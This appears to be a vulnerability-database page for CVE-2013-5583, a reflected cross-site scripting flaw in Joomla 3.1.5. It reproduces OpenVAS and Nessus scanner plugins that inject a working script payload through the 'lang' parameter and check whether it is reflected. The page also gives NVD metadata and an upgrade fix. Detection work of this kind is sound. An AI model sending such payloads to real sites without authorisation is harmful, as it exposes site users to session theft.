Joomla! 'lang' Parameter Reflected Cross Site Scripting Vulnerability
2014-01-06T00:00:00
ID OPENVAS:1361412562310804057 Type openvas Reporter Copyright (C) 2014 Greenbone Networks GmbH Modified 2020-05-08T00:00:00
Description
This host is installed with Joomla and is prone to cross site scripting
vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_joomla_lang_parm_xss_vuln.nasl 34118 2014-01-06 12:53:52Z Jan$
#
# Joomla! 'lang' Parameter Reflected Cross Site Scripting Vulnerability
#
# Authors:
# Thanga Prakash S <tprakash@secpod.com>
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:joomla:joomla";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.804057");
script_version("2020-05-08T08:34:44+0000");
script_cve_id("CVE-2013-5583");
script_bugtraq_id(61600);
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_tag(name:"last_modification", value:"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)");
script_tag(name:"creation_date", value:"2014-01-06 12:53:52 +0530 (Mon, 06 Jan 2014)");
script_name("Joomla! 'lang' Parameter Reflected Cross Site Scripting Vulnerability");
script_tag(name:"summary", value:"This host is installed with Joomla and is prone to cross site scripting
vulnerability.");
script_tag(name:"vuldetect", value:"Send a crafted data via HTTP GET request and check whether it is able to
read cookie or not.");
script_tag(name:"solution", value:"Upgrade to Joomla version 3.1.6 or later.");
script_tag(name:"insight", value:"Input passed via the 'lang' parameter to
'/libraries/idna_convert/example.php' script is not properly sanitized before being returned to the user.");
script_tag(name:"affected", value:"Joomla version 3.1.5 and prior.");
script_tag(name:"impact", value:"Successful exploitation will allow attacker to execute arbitrary HTML and
script code in a user's browser session in the context of an affected site.");
script_xref(name:"URL", value:"http://secunia.com/advisories/54353");
script_xref(name:"URL", value:"http://seclists.org/bugtraq/2013/Aug/27");
script_xref(name:"URL", value:"https://github.com/joomla/joomla-cms/issues/1658");
script_xref(name:"URL", value:"http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_analysis");
script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
script_family("Web application abuses");
script_dependencies("joomla_detect.nasl");
script_mandatory_keys("joomla/installed");
script_require_ports("Services/www", 80);
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
if (!jPort = get_app_port(cpe:CPE))
exit(0);
if (!dir = get_app_location(cpe:CPE, port:jPort))
exit(0);
if (dir == "/")
dir = "";
url = dir + '/libraries/idna_convert/example.php?lang=";><script>alert(document.cookie);</script><!--';
if (http_vuln_check(port:jPort, url:url, check_header:TRUE, pattern:"><script>alert\(document.cookie\);</script>",
extra_check:">phlyLabs")) {
report = http_report_vuln_url( port:jPort, url:url );
security_message(port:jPort, data:report);
exit(0);
}
exit(99);
{"id": "OPENVAS:1361412562310804057", "type": "openvas", "bulletinFamily": "scanner", "title": "Joomla! 'lang' Parameter Reflected Cross Site Scripting Vulnerability", "description": "This host is installed with Joomla and is prone to cross site scripting\nvulnerability.", "published": "2014-01-06T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804057", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["http://seclists.org/bugtraq/2013/Aug/27", "http://secunia.com/advisories/54353", "http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability", "https://github.com/joomla/joomla-cms/issues/1658"], "cvelist": ["CVE-2013-5583"], "lastseen": "2020-05-12T17:26:21", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-5583"]}, {"type": "nessus", "idList": ["JOOMLA_EXAMPLE_LANG_XSS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803850"]}], "modified": "2020-05-12T17:26:21", "rev": 2}, "score": {"value": 4.9, "vector": "NONE", "modified": "2020-05-12T17:26:21", "rev": 2}, "vulnersScore": 4.9}, "pluginID": "1361412562310804057", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_joomla_lang_parm_xss_vuln.nasl 34118 2014-01-06 12:53:52Z Jan$\n#\n# Joomla! 'lang' Parameter Reflected Cross Site Scripting Vulnerability\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:joomla:joomla\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804057\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-5583\");\n script_bugtraq_id(61600);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-01-06 12:53:52 +0530 (Mon, 06 Jan 2014)\");\n\n script_name(\"Joomla! 'lang' Parameter Reflected Cross Site Scripting Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Joomla and is prone to cross site scripting\nvulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request and check whether it is able to\nread cookie or not.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Joomla version 3.1.6 or later.\");\n\n script_tag(name:\"insight\", value:\"Input passed via the 'lang' parameter to\n'/libraries/idna_convert/example.php' script is not properly sanitized before being returned to the user.\");\n\n script_tag(name:\"affected\", value:\"Joomla version 3.1.5 and prior.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary HTML and\nscript code in a user's browser session in the context of an affected site.\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54353\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/27\");\n script_xref(name:\"URL\", value:\"https://github.com/joomla/joomla-cms/issues/1658\");\n script_xref(name:\"URL\", value:\"http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"joomla_detect.nasl\");\n script_mandatory_keys(\"joomla/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!jPort = get_app_port(cpe:CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe:CPE, port:jPort))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + '/libraries/idna_convert/example.php?lang=\";><script>alert(document.cookie);</script><!--';\n\nif (http_vuln_check(port:jPort, url:url, check_header:TRUE, pattern:\"><script>alert\\(document.cookie\\);</script>\",\n extra_check:\">phlyLabs\")) {\n report = http_report_vuln_url( port:jPort, url:url );\n security_message(port:jPort, data:report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}
{"cve": [{"lastseen": "2021-02-02T06:06:58", "description": "Cross-site scripting (XSS) vulnerability in libraries/idna_convert/example.php in Joomla! 3.1.5 allows remote attackers to inject arbitrary web script or HTML via the lang parameter.", "edition": 4, "cvss3": {}, "published": "2013-12-29T04:25:00", "title": "CVE-2013-5583", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5583"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:joomla:joomla\\!:3.1.5"], "id": "CVE-2013-5583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5583", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:joomla:joomla\\!:3.1.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:27:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-5583"], "description": "This host is running Joomla and is prone to xss vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2013-08-06T00:00:00", "id": "OPENVAS:1361412562310803850", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803850", "type": "openvas", "title": "Joomla 'lang' Parameter Cross Site Scripting Vulnerability-August13", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Joomla 'lang' Parameter Cross Site Scripting Vulnerability-August13\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:joomla:joomla\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803850\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-08-06 12:51:57 +0530 (Tue, 06 Aug 2013)\");\n\n script_name(\"Joomla 'lang' Parameter Cross Site Scripting Vulnerability-August13\");\n\n script_cve_id(\"CVE-2013-5583\");\n\n script_tag(name:\"summary\", value:\"This host is running Joomla and is prone to xss vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request and check whether it is able to\nread cookie or not.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 3.2.0 or later.\");\n\n script_tag(name:\"insight\", value:\"Input passed via 'lang' parameter to 'libraries/idna_convert/example.php'\nis not properly sanitised before being returned to the user.\");\n\n script_tag(name:\"affected\", value:\"Joomla versions 3.1.5 and prior\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attacker to execute arbitrary HTML\nor script code or discloses sensitive information resulting in loss of confidentiality.\");\n\n script_xref(name:\"URL\", value:\"http://cxsecurity.com/issue/WLB-2013080045\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527765\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/na/joomla-315-cross-site-scripting\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"joomla/installed\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.joomla.org/download.html\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + '/libraries/idna_convert/example.php?lang=\"><script>alert(document.cookie);</script><!--';\n\nif(http_vuln_check(port:port, url:url, check_header:TRUE, pattern:\"<script>alert\\(document\\.cookie\\);</script>\",\n extra_check:\">phlyLabs\")) {\n report = http_report_vuln_url( port:port, url:url );\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2021-01-20T11:36:23", "description": "The version of Joomla! running on the remote host is affected by a\ncross-site scripting (XSS) vulnerability in idna_convert/example.php\ndue to improper sanitization of user-supplied input to the 'lang'\nparameter before using it to generate dynamic HTML content. An\nunauthenticated, remote attacker can exploit this to inject arbitrary\nHTML and script code into the user's browser session.", "edition": 29, "cvss3": {"score": 4.7, "vector": "AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N"}, "published": "2013-08-09T00:00:00", "title": "Joomla! 'lang' Parameter XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-5583"], "modified": "2013-08-09T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "JOOMLA_EXAMPLE_LANG_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/69280", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69280);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-5583\");\n script_bugtraq_id(61600);\n\n script_name(english:\"Joomla! 'lang' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via the lang parameter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by a\ncross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Joomla! running on the remote host is affected by a\ncross-site scripting (XSS) vulnerability in idna_convert/example.php\ndue to improper sanitization of user-supplied input to the 'lang'\nparameter before using it to generate dynamic HTML content. An\nunauthenticated, remote attacker can exploit this to inject arbitrary\nHTML and script code into the user's browser session.\");\n # https://web.archive.org/web/20160402054936/http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ceaad26b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/joomla/joomla-cms/issues/1658\");\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time. It is suggested that the script be removed.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\nxss_test = '\";><script>alert(' + \"'\" + SCRIPT_NAME + '-' + unixtime() + \"'\" + ');</script>';\n\nexploit = test_cgi_xss(\n port : port,\n dirs : make_list(dir),\n cgi : '/libraries/idna_convert/example.php',\n qs : 'lang=' + xss_test,\n pass_str : 'name=\"lang\" value=\"' + xss_test,\n pass_re : 'name=\"idn_version\"'\n);\n\nif (!exploit)\n{\n install_url = build_url(qs: dir, port: port);\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
